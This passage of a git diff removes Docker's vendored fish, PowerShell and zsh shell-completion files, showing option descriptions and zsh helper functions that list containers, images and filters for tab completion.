docker -A -f -n '__fish_seen_subcommand_from run' -s h -l hostname -d 'Container host name' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s i -l interactive -d 'Keep STDIN open even if not attached' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l link -d 'Add link to another container in the form of :alias' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s m -l memory -d 'Memory limit (format: [], where unit = b, k, m or g)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l mac-address -d 'Container MAC address (e.g. 92:d0:c6:0a:29:33)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: [], where unit = b, k, m or g)" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l name -d 'Assign a name to the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l net -d 'Set the Network mode for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s p -l publish -d "Publish a container's port to the host" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l pid -d 'Default is to create a private PID namespace for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l privileged -d 'Give extended privileges to this container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l read-only -d "Mount the container's root filesystem as read only" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l rm -d 'Automatically remove the container when it exits (incompatible with -d)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l security-opt -d 'Security Options' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l sig-proxy -d 'Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied.' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l stop-signal -d 'Signal to kill a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s t -l tty -d 'Allocate a pseudo-TTY' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s u -l user -d 'Username or UID' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l tmpfs -d 'Mount tmpfs on a directory' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l volumes-from -d 'Mount volumes from the specified container(s)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s w -l workdir -d 'Working directory inside the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -a '(__fish_print_docker_images)' -d "Image" - -# save -complete -c docker -f -n '__fish_docker_no_subcommand' -a save -d 'Save an image to a tar archive' -complete -c docker -A -f -n '__fish_seen_subcommand_from save' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from save' -s o -l output -d 'Write to an file, instead of STDOUT' -complete -c docker -A -f -n '__fish_seen_subcommand_from save' -a '(__fish_print_docker_images)' -d "Image" - -# search -complete -c docker -f -n '__fish_docker_no_subcommand' -a search -d 'Search for an image on the registry (defaults to the Docker Hub)' -complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l automated -d 'Only show automated builds' -complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l no-trunc -d "Don't truncate output" -complete -c docker -A -f -n '__fish_seen_subcommand_from search' -s s -l stars -d 'Only displays with at least x stars' - -# start -complete -c docker -f -n '__fish_docker_no_subcommand' -a start -d 'Start a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s a -l attach -d "Attach container's STDOUT and STDERR and forward all signals to the process" -complete -c docker -A -f -n '__fish_seen_subcommand_from start' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s i -l interactive -d "Attach container's STDIN" -complete -c docker -A -f -n '__fish_seen_subcommand_from start' -a '(__fish_print_docker_containers stopped)' -d "Container" - -# stats -complete -c docker -f -n '__fish_docker_no_subcommand' -a stats -d "Display a live stream of one or more containers' resource usage statistics" -complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l no-stream -d 'Disable streaming stats and only pull the first result' -complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -a '(__fish_print_docker_containers running)' -d "Container" - -# stop -complete -c docker -f -n '__fish_docker_no_subcommand' -a stop -d 'Stop a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -s t -l time -d 'Number of seconds to wait for the container to stop before killing it. Default is 10 seconds.' -complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -a '(__fish_print_docker_containers running)' -d "Container" - -# tag -complete -c docker -f -n '__fish_docker_no_subcommand' -a tag -d 'Tag an image into a repository' -complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -s f -l force -d 'Force' -complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -l help -d 'Print usage' - -# top -complete -c docker -f -n '__fish_docker_no_subcommand' -a top -d 'Lookup the running processes of a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from top' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from top' -a '(__fish_print_docker_containers running)' -d "Container" - -# unpause -complete -c docker -f -n '__fish_docker_no_subcommand' -a unpause -d 'Unpause a paused container' -complete -c docker -A -f -n '__fish_seen_subcommand_from unpause' -a '(__fish_print_docker_containers running)' -d "Container" - -# version -complete -c docker -f -n '__fish_docker_no_subcommand' -a version -d 'Show the Docker version information' -complete -c docker -A -f -n '__fish_seen_subcommand_from version' -s f -l format -d 'Format the output using the given go template' -complete -c docker -A -f -n '__fish_seen_subcommand_from version' -l help -d 'Print usage' - -# wait -complete -c docker -f -n '__fish_docker_no_subcommand' -a wait -d 'Block until a container stops, then print its exit code' -complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -a '(__fish_print_docker_containers running)' -d "Container" diff --git a/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt b/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt deleted file mode 100644 index 18e1b53c13..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt +++ /dev/null @@ -1 +0,0 @@ -See https://github.com/samneirinck/posh-docker \ No newline at end of file diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS deleted file mode 100644 index 03ee2dde3d..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS +++ /dev/null @@ -1,2 +0,0 @@ -Tianon Gravi (@tianon) -Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/_docker b/vendor/github.com/docker/docker/contrib/completion/zsh/_docker deleted file mode 100644 index ecae826a4a..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/zsh/_docker +++ /dev/null @@ -1,2787 +0,0 @@ -#compdef docker dockerd -# -# zsh completion for docker (http://docker.com) -# -# version: 0.3.0 -# github: https://github.com/felixr/docker-zsh-completion -# -# contributors: -# - Felix Riedel -# - Steve Durrheimer -# - Vincent Bernat -# -# license: -# -# Copyright (c) 2013, Felix Riedel -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright -# notice, this list of conditions and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * Neither the name of the nor the -# names of its contributors may be used to endorse or promote products -# derived from this software without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -# - -# Short-option stacking can be enabled with: -# zstyle ':completion:*:*:docker:*' option-stacking yes -# zstyle ':completion:*:*:docker-*:*' option-stacking yes -__docker_arguments() { - if zstyle -t ":completion:${curcontext}:" option-stacking; then - print -- -s - fi -} - -__docker_get_containers() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local kind type line s - declare -a running stopped lines args names - - kind=$1; shift - type=$1; shift - [[ $kind = (stopped|all) ]] && args=($args -a) - - lines=(${(f)${:-"$(_call_program commands docker $docker_options ps --format 'table' --no-trunc $args)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 # Last column, should go to the end of the line - lines=(${lines[2,-1]}) - - # Container ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${${line[${begin[CONTAINER ID]},${end[CONTAINER ID]}]%% ##}[0,12]}" - s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}" - s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}" - if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then - stopped=($stopped $s) - else - running=($running $s) - fi - done - fi - - # Names: we only display the one without slash. All other names - # are generated and may clutter the completion. However, with - # Swarm, all names may be prefixed by the swarm node name. - if [[ $type = (names|all) ]]; then - for line in $lines; do - names=(${(ps:,:)${${line[${begin[NAMES]},${end[NAMES]}]}%% *}}) - # First step: find a common prefix and strip it (swarm node case) - (( ${#${(u)names%%/*}} == 1 )) && names=${names#${names[1]%%/*}/} - # Second step: only keep the first name without a / - s=${${names:#*/*}[1]} - # If no name, well give up. - (( $#s != 0 )) || continue - s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}" - s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}" - if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then - stopped=($stopped $s) - else - running=($running $s) - fi - done - fi - - [[ $kind = (running|all) ]] && _describe -t containers-running "running containers" running "$@" && ret=0 - [[ $kind = (stopped|all) ]] && _describe -t containers-stopped "stopped containers" stopped "$@" && ret=0 - return ret -} - -__docker_complete_stopped_containers() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers stopped all "$@" -} - -__docker_complete_running_containers() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers running all "$@" -} - -__docker_complete_containers() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers all all "$@" -} - -__docker_complete_containers_ids() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers all ids "$@" -} - -__docker_complete_containers_names() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers all names "$@" -} - -__docker_complete_info_plugins() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - emulate -L zsh - setopt extendedglob - local -a plugins - plugins=(${(ps: :)${(M)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Plugins:}%%$'\n'^ *}}:# $1: *}## $1: }) - _describe -t plugins "$1 plugins" plugins && ret=0 - return ret -} - -__docker_complete_images() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a images - images=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/(#b)([^ ]##) ##([^ ]##) ##([^ ]##)*/${match[3]}:${(r:15:: :::)match[2]} in ${match[1]}}) - _describe -t docker-images "images" images && ret=0 - __docker_complete_repositories_with_tags && ret=0 - return ret -} - -__docker_complete_repositories() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a repos - repos=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}%% *}[2,-1]}) - repos=(${repos#}) - _describe -t docker-repos "repositories" repos && ret=0 - return ret -} - -__docker_complete_repositories_with_tags() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a repos onlyrepos matched - declare m - repos=(${${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/ ##/:::}%% *}) - repos=(${${repos%:::}#}) - # Check if we have a prefix-match for the current prefix. - onlyrepos=(${repos%::*}) - for m in $onlyrepos; do - [[ ${PREFIX##${~~m}} != ${PREFIX} ]] && { - # Yes, complete with tags - repos=(${${repos/:::/:}/:/\\:}) - _describe -t docker-repos-with-tags "repositories with tags" repos && ret=0 - return ret - } - done - # No, only complete repositories - onlyrepos=(${${repos%:::*}/:/\\:}) - _describe -t docker-repos "repositories" onlyrepos -qS : && ret=0 - - return ret -} - -__docker_search() { - [[ $PREFIX = -* ]] && return 1 - local cache_policy - zstyle -s ":completion:${curcontext}:" cache-policy cache_policy - if [[ -z "$cache_policy" ]]; then - zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy - fi - - local searchterm cachename - searchterm="${words[$CURRENT]%/}" - cachename=_docker-search-$searchterm - - local expl - local -a result - if ( [[ ${(P)+cachename} -eq 0 ]] || _cache_invalid ${cachename#_} ) \ - && ! _retrieve_cache ${cachename#_}; then - _message "Searching for ${searchterm}..." - result=(${${${(f)${:-"$(_call_program commands docker $docker_options search $searchterm)"$'\n'}}%% *}[2,-1]}) - _store_cache ${cachename#_} result - fi - _wanted dockersearch expl 'available images' compadd -a result -} - -__docker_get_log_options() { - [[ $PREFIX = -* ]] && return 1 - - integer ret=1 - local log_driver=${opt_args[--log-driver]:-"all"} - local -a awslogs_options fluentd_options gelf_options journald_options json_file_options logentries_options syslog_options splunk_options - - awslogs_options=("awslogs-region" "awslogs-group" "awslogs-stream") - fluentd_options=("env" "fluentd-address" "fluentd-async-connect" "fluentd-buffer-limit" "fluentd-retry-wait" "fluentd-max-retries" "labels" "tag") - gcplogs_options=("env" "gcp-log-cmd" "gcp-project" "labels") - gelf_options=("env" "gelf-address" "gelf-compression-level" "gelf-compression-type" "labels" "tag") - journald_options=("env" "labels" "tag") - json_file_options=("env" "labels" "max-file" "max-size") - logentries_options=("logentries-token") - syslog_options=("env" "labels" "syslog-address" "syslog-facility" "syslog-format" "syslog-tls-ca-cert" "syslog-tls-cert" "syslog-tls-key" "syslog-tls-skip-verify" "tag") - splunk_options=("env" "labels" "splunk-caname" "splunk-capath" "splunk-format" "splunk-gzip" "splunk-gzip-level" "splunk-index" "splunk-insecureskipverify" "splunk-source" "splunk-sourcetype" "splunk-token" "splunk-url" "splunk-verify-connection" "tag") - - [[ $log_driver = (awslogs|all) ]] && _describe -t awslogs-options "awslogs options" awslogs_options "$@" && ret=0 - [[ $log_driver = (fluentd|all) ]] && _describe -t fluentd-options "fluentd options" fluentd_options "$@" && ret=0 - [[ $log_driver = (gcplogs|all) ]] && _describe -t gcplogs-options "gcplogs options" gcplogs_options "$@" && ret=0 - [[ $log_driver = (gelf|all) ]] && _describe -t gelf-options "gelf options" gelf_options "$@" && ret=0 - [[ $log_driver = (journald|all) ]] && _describe -t journald-options "journald options" journald_options "$@" && ret=0 - [[ $log_driver = (json-file|all) ]] && _describe -t json-file-options "json-file options" json_file_options "$@" && ret=0 - [[ $log_driver = (logentries|all) ]] && _describe -t logentries-options "logentries options" logentries_options "$@" && ret=0 - [[ $log_driver = (syslog|all) ]] && _describe -t syslog-options "syslog options" syslog_options "$@" && ret=0 - [[ $log_driver = (splunk|all) ]] && _describe -t splunk-options "splunk options" splunk_options "$@" && ret=0 - - return ret -} - -__docker_complete_log_drivers() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - drivers=(awslogs etwlogs fluentd gcplogs gelf journald json-file none splunk syslog) - _describe -t log-drivers "log drivers" drivers && ret=0 - return ret -} - -__docker_complete_log_options() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (syslog-format) - syslog_format_opts=('rfc3164' 'rfc5424' 'rfc5424micro') - _describe -t syslog-format-opts "Syslog format Options" syslog_format_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - __docker_get_log_options -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_detach_keys() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - compset -P "*," - keys=(${:-{a-z}}) - ctrl_keys=(${:-ctrl-{{a-z},{@,'[','\\','^',']',_}}}) - _describe -t detach_keys "[a-z]" keys -qS "," && ret=0 - _describe -t detach_keys-ctrl "'ctrl-' + 'a-z @ [ \\\\ ] ^ _'" ctrl_keys -qS "," && ret=0 -} - -__docker_complete_pid() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local -a opts vopts - - opts=('host') - vopts=('container') - - if compset -P '*:'; then - case "${${words[-1]%:*}#*=}" in - (container) - __docker_complete_running_containers && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t pid-value-opts "PID Options with value" vopts -qS ":" && ret=0 - _describe -t pid-opts "PID Options" opts && ret=0 - fi - - return ret -} - -__docker_complete_runtimes() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - emulate -L zsh - setopt extendedglob - local -a runtimes_opts - runtimes_opts=(${(ps: :)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Runtimes: }%%$'\n'^ *}}}) - _describe -t runtimes-opts "runtimes options" runtimes_opts && ret=0 -} - -__docker_complete_ps_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (ancestor) - __docker_complete_images && ret=0 - ;; - (before|since) - __docker_complete_containers && ret=0 - ;; - (health) - health_opts=('healthy' 'none' 'starting' 'unhealthy') - _describe -t health-filter-opts "health filter options" health_opts && ret=0 - ;; - (id) - __docker_complete_containers_ids && ret=0 - ;; - (is-task) - _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 - ;; - (name) - __docker_complete_containers_names && ret=0 - ;; - (network) - __docker_complete_networks && ret=0 - ;; - (status) - status_opts=('created' 'dead' 'exited' 'paused' 'restarting' 'running' 'removing') - _describe -t status-filter-opts "status filter options" status_opts && ret=0 - ;; - (volume) - __docker_complete_volumes && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('ancestor' 'before' 'exited' 'health' 'id' 'label' 'name' 'network' 'since' 'status' 'volume') - _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_search_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a boolean_opts opts - - boolean_opts=('true' 'false') - opts=('is-automated' 'is-official' 'stars') - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (is-automated|is-official) - _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_images_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a boolean_opts opts - - boolean_opts=('true' 'false') - opts=('before' 'dangling' 'label' 'reference' 'since') - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (before|reference|since) - __docker_complete_images && ret=0 - ;; - (dangling) - _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_events_filter() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a opts - - opts=('container' 'daemon' 'event' 'image' 'label' 'network' 'type' 'volume') - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (container) - __docker_complete_containers && ret=0 - ;; - (daemon) - emulate -L zsh - setopt extendedglob - local -a daemon_opts - daemon_opts=( - ${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Name: }%%$'\n'^ *}} - ${${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'ID: }%%$'\n'^ *}}//:/\\:} - ) - _describe -t daemon-filter-opts "daemon filter options" daemon_opts && ret=0 - ;; - (event) - local -a event_opts - event_opts=('attach' 'commit' 'connect' 'copy' 'create' 'delete' 'destroy' 'detach' 'die' 'disconnect' 'exec_create' 'exec_detach' - 'exec_start' 'export' 'health_status' 'import' 'kill' 'load' 'mount' 'oom' 'pause' 'pull' 'push' 'reload' 'rename' 'resize' 'restart' 'save' 'start' - 'stop' 'tag' 'top' 'unmount' 'unpause' 'untag' 'update') - _describe -t event-filter-opts "event filter options" event_opts && ret=0 - ;; - (image) - __docker_complete_images && ret=0 - ;; - (network) - __docker_complete_networks && ret=0 - ;; - (type) - local -a type_opts - type_opts=('container' 'daemon' 'image' 'network' 'volume') - _describe -t type-filter-opts "type filter options" type_opts && ret=0 - ;; - (volume) - __docker_complete_volumes && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_prune_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a opts - - opts=('until') - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -# BO container - -__docker_container_commands() { - local -a _docker_container_subcommands - _docker_container_subcommands=( - "attach:Attach to a running container" - "commit:Create a new image from a container's changes" - "cp:Copy files/folders between a container and the local filesystem" - "create:Create a new container" - "diff:Inspect changes on a container's filesystem" - "exec:Run a command in a running container" - "export:Export a container's filesystem as a tar archive" - "inspect:Display detailed information on one or more containers" - "kill:Kill one or more running containers" - "logs:Fetch the logs of a container" - "ls:List containers" - "pause:Pause all processes within one or more containers" - "port:List port mappings or a specific mapping for the container" - "prune:Remove all stopped containers" - "rename:Rename a container" - "restart:Restart one or more containers" - "rm:Remove one or more containers" - "run:Run a command in a new container" - "start:Start one or more stopped containers" - "stats:Display a live stream of container(s) resource usage statistics" - "stop:Stop one or more running containers" - "top:Display the running processes of a container" - "unpause:Unpause all processes within one or more containers" - "update:Update configuration of one or more containers" - "wait:Block until one or more containers stop, then print their exit codes" - ) - _describe -t docker-container-commands "docker container command" _docker_container_subcommands -} - -__docker_container_subcommand() { - local -a _command_args opts_help opts_attach_exec_run_start opts_create_run opts_create_run_update - local expl help="--help" - integer ret=1 - - opts_attach_exec_run_start=( - "($help)--detach-keys=[Escape key sequence used to detach a container]:sequence:__docker_complete_detach_keys" - ) - opts_create_run=( - "($help -a --attach)"{-a=,--attach=}"[Attach to stdin, stdout or stderr]:device:(STDIN STDOUT STDERR)" - "($help)*--add-host=[Add a custom host-to-IP mapping]:host\:ip mapping: " - "($help)*--blkio-weight-device=[Block IO (relative device weight)]:device:Block IO weight: " - "($help)*--cap-add=[Add Linux capabilities]:capability: " - "($help)*--cap-drop=[Drop Linux capabilities]:capability: " - "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " - "($help)--cidfile=[Write the container ID to the file]:CID file:_files" - "($help)--cpus=[Number of CPUs (default 0.000)]:cpus: " - "($help)*--device=[Add a host device to the container]:device:_files" - "($help)*--device-read-bps=[Limit the read rate (bytes per second) from a device]:device:IO rate: " - "($help)*--device-read-iops=[Limit the read rate (IO per second) from a device]:device:IO rate: " - "($help)*--device-write-bps=[Limit the write rate (bytes per second) to a device]:device:IO rate: " - "($help)*--device-write-iops=[Limit the write rate (IO per second) to a device]:device:IO rate: " - "($help)--disable-content-trust[Skip image verification]" - "($help)*--dns=[Custom DNS servers]:DNS server: " - "($help)*--dns-option=[Custom DNS options]:DNS option: " - "($help)*--dns-search=[Custom DNS search domains]:DNS domains: " - "($help)*"{-e=,--env=}"[Environment variables]:environment variable: " - "($help)--entrypoint=[Overwrite the default entrypoint of the image]:entry point: " - "($help)*--env-file=[Read environment variables from a file]:environment file:_files" - "($help)*--expose=[Expose a port from the container without publishing it]: " - "($help)*--group=[Set one or more supplementary user groups for the container]:group:_groups" - "($help -h --hostname)"{-h=,--hostname=}"[Container host name]:hostname:_hosts" - "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" - "($help)--init[Run an init inside the container that forwards signals and reaps processes]" - "($help)--ip=[Container IPv4 address]:IPv4: " - "($help)--ip6=[Container IPv6 address]:IPv6: " - "($help)--ipc=[IPC namespace to use]:IPC namespace: " - "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" - "($help)*--link=[Add link to another container]:link:->link" - "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " - "($help)*"{-l=,--label=}"[Container metadata]:label: " - "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" - "($help)*--log-opt=[Log driver specific options]:log driver options:__docker_complete_log_options" - "($help)--mac-address=[Container MAC address]:MAC address: " - "($help)--name=[Container name]:name: " - "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" - "($help)*--network-alias=[Add network-scoped alias for the container]:alias: " - "($help)--oom-kill-disable[Disable OOM Killer]" - "($help)--oom-score-adj[Tune the host's OOM preferences for containers (accepts -1000 to 1000)]" - "($help)--pids-limit[Tune container pids limit (set -1 for unlimited)]" - "($help -P --publish-all)"{-P,--publish-all}"[Publish all exposed ports]" - "($help)*"{-p=,--publish=}"[Expose a container's port to the host]:port:_ports" - "($help)--pid=[PID namespace to use]:PID namespace:__docker_complete_pid" - "($help)--privileged[Give extended privileges to this container]" - "($help)--read-only[Mount the container's root filesystem as read only]" - "($help)*--security-opt=[Security options]:security option: " - "($help)*--shm-size=[Size of '/dev/shm' (format is '')]:shm size: " - "($help)--stop-timeout=[Timeout (in seconds) to stop a container]:time: " - "($help)*--sysctl=-[sysctl options]:sysctl: " - "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" - "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" - "($help)*--ulimit=[ulimit options]:ulimit: " - "($help)--userns=[Container user namespace]:user namespace:(host)" - "($help)--tmpfs[mount tmpfs]" - "($help)*-v[Bind mount a volume]:volume: " - "($help)--volume-driver=[Optional volume driver for the container]:volume driver:(local)" - "($help)*--volumes-from=[Mount volumes from the specified container]:volume: " - "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories" - ) - opts_create_run_update=( - "($help)--blkio-weight=[Block IO (relative weight), between 10 and 1000]:Block IO weight:(10 100 500 1000)" - "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)" - "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " - "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " - "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " - "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " - "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " - "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " - "($help)--kernel-memory=[Kernel memory limit in bytes]:Memory limit: " - "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " - "($help)--memory-reservation=[Memory soft limit]:Memory limit: " - "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " - "($help)--restart=[Restart policy]:restart policy:(no on-failure always unless-stopped)" - ) - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (attach) - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_attach_exec_run_start \ - "($help)--no-stdin[Do not attach stdin]" \ - "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \ - "($help -):containers:__docker_complete_running_containers" && ret=0 - ;; - (commit) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --author)"{-a=,--author=}"[Author]:author: " \ - "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \ - "($help -m --message)"{-m=,--message=}"[Commit message]:message: " \ - "($help -p --pause)"{-p,--pause}"[Pause container during commit]" \ - "($help -):container:__docker_complete_containers" \ - "($help -): :__docker_complete_repositories_with_tags" && ret=0 - ;; - (cp) - local state - _arguments $(__docker_arguments) \ - 